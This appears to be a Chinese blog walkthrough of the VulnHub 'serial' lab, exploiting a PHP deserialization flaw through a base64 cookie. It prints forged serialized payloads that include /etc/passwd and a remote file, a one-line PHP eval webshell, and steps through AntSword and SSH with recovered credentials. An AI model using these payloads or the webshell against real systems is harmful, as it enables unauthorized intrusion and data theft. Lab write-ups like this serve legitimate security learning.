当前位置：首页 > news >正文

反序列化漏洞vulhub靶场serial

news 2026/2/7 21:23:08

环境搭建

下载

https://download.vulnhub.com/serial/serial.zip

解压出来就是这种

你会得到一个这样的文件，这里使用VMware新建一个虚拟机，这里记录比较重要的几部分。

这里就是使用我们刚才下过来的。

漏洞过程详解

1.信息收集

打开靶机，在kali虚拟机中进行主机存活探测

arp-scan -l

分析一下，可知靶机IP地址位192.168.3.131

2.端口扫描

nmap -p- 192.168.3.131 --min-rate=10000（以最小速率10000扫描）

3.目录扫描

可以都访问一下

在backup目录下发现bak.zip文件，下载下来

4.漏洞扫描

分析文件
index.php

发现三个文件有包含的关系，放到同一文件中分析

<?phpclass Log {private $type_log;function __costruct($hnd) {$this->$type_log = $hnd;}public function handler($val) {include($this->type_log);echo "LOG: " . $val;}}class Welcome {public function handler($val) {echo "Hello " . $val;}}class User {private $name;private $wel;function __construct($name) {$this->name = $name;$this->wel = new Welcome();}function __destruct() {//echo "bye\n";$this->wel->handler($this->name);}}if(!isset($_COOKIE['user'])) {setcookie("user", base64_encode(serialize(new User('sk4'))));} else {unserialize(base64_decode($_COOKIE['user']));}echo "This is a beta test for new cookie handler\n";
?>

发现有三个类，如果用户没有COOKIE，就给用户生成一个名为sk4的COOKIE，否则将用户的COOKIE反序列化；
COOKIE的值为对User对象的序列化结果进行Base64位编码后的结果；
User类中有两个魔法方法，分别为创建和销毁时调用
我们代理抓包，进入repeater模块

尝试将COOKIE删除，相应包中带来了COOKIE,用户名为sk4

将COOKIE撤销回去

5.尝试更改 COOKIE

选中COOKIE，在burp的解码器中可以看出这里的cookie经过了URL编码，将%3D改成=

再次选中COOKIE，将解码方式改为Base64，可以看出结果为User类的序列化结果

进行Base64解码，修改用户名及其长度

O:4:"User":2:{s:10:"Username";s:5:"mzqms";s:9:"Userwel";O:7:"Welcome":0:{}}7

漏洞利用

漏洞存在，思考利用

继续分析代码，发现Wel实例销毁时调用了公共方法hadler，而hadler方法不止在Welcome类中有，在Log类中不仅存在hadler方法，还存在文件包含，所以替换COOKIE中的Welocome实例
由于目标系统为Linux，所以文件包含passwd

这里可以直接用我下面的

O:4:"User":2:{s:4:"name";s:3:"sk4";s:3:"wel";O:3:"Log":1:{s:8:"type_log";s:11:"/etc/passwd";}}

发现passwd文件显示了出来

尝试远程文件包含

开启Windows系统的服务器，根目录下创建一个1.txt文件

更改COOKIE，要改成自己的window的ip

将1.txt改为一句话木马

<?php
@eval($_POST['cmd']);
?>

打开蚁剑连接将Cookie放入Http头中

测试连接连接成功

浏览目录，发现根目录下有credentials.txt.bak文件

应该是sk4用户的密码，由于22端口开启，尝试远程连接
ssh sk4@192.168.3.131

登陆成功，依旧浏览目录，发现flag

反序列化漏洞vulhub靶场serial

环境搭建下载 https://download.vulnhub.com/serial/serial.zip 解压出来就是这种你会得到一个这样的文件，这里使用VMware新建一个虚拟机，这里记录比较重要的几部分。这里就是使用我们刚才下过来的。漏洞过程详解 1.信息收集打开靶机&#xff0…...

编程日记 2024/8/2 2:11:58

C++ 文件流详解

在 C 中，文件处理是一个常见且重要的任务。标准库提供了三种主要的文件流类来处理文件输入和输出：fstream、ifstream 和 ofstream。这些类都在 <fstream> 头文件中定义。一、fstream 类 fstream 是文件流类的基类，既可以用于读操作&…...

编程日记 2024/8/2 2:10:57

目录 1. Docker Compose 简介 2. Docker Compose 安装 2.1 在 Ubuntu 上安装 Docker Compose 2.1.1 通过 apt 安装 2.1.2 使用官方脚本安装最新版本 2.2 在 CentOS 上安装 Docker Compose 2.2.2 使用官方脚本安装最新版本 2.2.3 使用 pip 安装 2.3 在 openEuler 上安装…...

编程日记 2024/8/2 2:09:56

基于深度学习的零样本学习

零样本学习（Zero-Shot Learning, ZSL）是深度学习中的一个前沿研究领域，其目标是在没有见过目标类别的样本的情况下，对这些新类别进行识别或分类。这种方法特别适用于在实际应用中存在大量未标注类别或新类别不断涌现的场景&#x…...

编程日记 2024/8/2 2:08:55

C++——list容器以及手动实现

LIST容器 list概述列表容器属性例子 list函数构造函数默认构造函数：带有元素个数和元素初值的构造函数：范围构造函数：拷贝构造函数：移动构造函数：示例赋值运算符重载拷贝赋值操作符 (1)：移动赋值操作符 (2…...

编程日记 2024/8/2 2:06:53

Win11系统文件资源管理器鼠标右键卡顿解决方法

引用链接： Windows 11文件资源管理器崩溃怎么解决？看看这7个解决办法！...

编程日记 2024/8/2 2:05:52

零基础学Python之第十八讲文件读写

当你开始学习Python编程时，文件读写是一个非常基础且重要的技能。本篇博客将引导你从零开始学习如何在Python中进行文件读写操作。 1. 打开文件在Python中，要操作一个文件，首先需要打开它。使用内置的 open() 函数来打开文件，语…...

编程日记 2024/8/2 2:04:52

检索增强生成（RAG）：智能内容生成的新纪元

引言在大 AI 时代，生成式人工智能（GenAI）模型，尤其是大型语言模型（LLM），已经展现出了令人瞩目的能力。然而，这些模型在提供信息的准确、即时、专业、权威等方面仍存在局限。检索增…...

编程日记 2024/8/2 2:03:49

ubuntu2204安装elasticsearch7.17.22

下载安装 wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.17.22-amd64.deb wget https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-7.17.22-amd64.deb.sha512 shasum -a 512 -c elasticsearch-7.17.22-amd64.deb.sha512 su…...

编程日记 2024/8/2 2:02:49

介绍Servlet后端中两种接收参数方式req.getAttributer和req.getParameter的区别

数据来源 getParameter：此方法用于获取客户端发送的请求中携带的参数，通常这些参数是通过HTTP GET或POST请求传递的表单数据。例如，用户填写的用户名和密码等输入信息。getAttribute：该方法用来获取在服务器端通过setAttribute方法…...

编程日记 2024/8/2 2:01:48

Delphi FMX安卓Android播放mp3音频内存流

【笔记：安卓开发JavaDelphi FMX】 Delphi FMX跨平台的MediaPlayer无法播放音频数据流只能打开音频文件播放，但有时候需要直接播放内存流数据而无需生成文件，可以通过把内存流转ByteArray再通过Android平台系统原生的MediaDataSource或ParcelF…...

编程日记 2024/8/2 2:00:47

MapUtils常用方法

1、摘要 MapUtils是一个用于处理Map对象的实用工具类，它提供了许多方便的方法来执行常见的操作，如获取值、设置默认值、合并Map等。本文将介绍MapUtils的常见用法，以帮助你更轻松地处理Map数据。 2、前言在Java编程中，Map是一…...

编程日记 2024/8/2 1:59:46

自定义PasswordEditText控件，在手机字体应用后，字体样式未发生改变

原来的输入类型inputType为textPassword，现在将 inputType删掉即可...

编程日记 2024/8/2 1:56:43

学习打卡第31天

...

编程日记 2024/8/2 1:55:42

opencascade AIS_TexturedShape源码学习贴纹理

opencascade AIS_TexturedShape opencascade 贴纹理前言 //! 该类允许在形状上映射纹理。 //! 显示模式 AIS_WireFrame (0) 和 AIS_Shaded (1) 的行为与 AIS_Shape 中的行为相同， //! 而新模式 2 (包围盒) 和 3 (纹理映射) 扩展了其功能。 //! //! 纹理本身在 (0…...

编程日记 2024/8/2 1:54:42

C# winform 串口读取字节流，MB级别字节流

一、串口读取字节流在 C# 中使用 Windows Forms (WinForms) 应用程序进行串口通信时，通常会使用 System.IO.Ports 命名空间中的 SerialPort 类。以下是一个简单的示例，展示了如何设置一个串口并读取字节流。步骤 1: 添加引用确保你的项目中已经包含…...

编程日记 2024/8/2 1:53:40

创建一个简单的单链表

1.头文件的Slist.h的代码 #pragma once #include<stdio.h> #include<stdlib.h> #include<assert.h> #include<string.h> typedef int SListint; typedef struct Slist//单链表 {SListint data;struct Slist* next; }SL;//尾插 void SlistPushBank(SL*…...

编程日记 2024/8/2 1:52:39

15.1 Zookeeper简介安装及基础使用

1. Zookeeper介绍 1.1 介绍 1.2 应用场景简介 1.3 zookeeper工作原理 1.4 zookeeper特点...

编程日记 2024/8/2 1:51:38

详细说明Java中Map和Set接口的使用方法

Map与Set的基本概念与场景 Map和set是一种专门用来进行搜索的容器或者数据结构，其搜索的效率与其具体的实例化子类有关。以前常见的搜索方式有： 1. 直接遍历，时间复杂度为O(N)，元素如果比较多效率会非常慢。 2. 二分查找&#x…...

编程日记 2024/8/2 1:48:35

CSS3 scale 适配

Scale适配，在前端开发中，特别是在CSS3中，主要指的是使用scale()函数对元素进行缩放处理，以适应不同的屏幕尺寸或达到特定的视觉效果。以下是对Scale适配的详细介绍： 一、基本概念 scale() 是CSS3中transform属性的一…...

编程日记 2024/8/2 1:47:34

调用支付宝接口响应40004 SYSTEM_ERROR问题排查

在对接支付宝API的时候，遇到了一些问题，记录一下排查过程。 Body:{"datadigital_fincloud_generalsaas_face_certify_initialize_response":{"msg":"Business Failed","code":"40004","sub_msg…...

编程新知 2026/2/4 16:30:39

简易版抽奖活动的设计技术方案

1.前言本技术方案旨在设计一套完整且可靠的抽奖活动逻辑，确保抽奖活动能够公平、公正、公开地进行，同时满足高并发访问、数据安全存储与高效处理等需求，为用户提供流畅的抽奖体验，助力业务顺利开展。本方案将涵盖抽奖活动的整体架构设计、核心流程逻辑、关键功能实现以及…...

编程新知 2026/2/7 17:41:40

关键领域软件测试的突围之路：如何破解安全与效率的平衡难题

在数字化浪潮席卷全球的今天，软件系统已成为国家关键领域的核心战斗力。不同于普通商业软件，这些承载着国家安全使命的软件系统面临着前所未有的质量挑战——如何在确保绝对安全的前提下，实现高效测试与快速迭代？这一命题正考验着…...

编程新知 2026/1/27 13:20:11

通过MicroSip配置自己的freeswitch服务器进行调试记录

之前用docker安装的freeswitch的，启动是正常的， 但用下面的Microsip连接不上主要原因有可能一下几个 1、通过下面命令可以看 [rootlocalhost default]# docker exec -it freeswitch fs_cli -x "sofia status profile internal"Name …...

编程新知 2026/2/6 14:23:05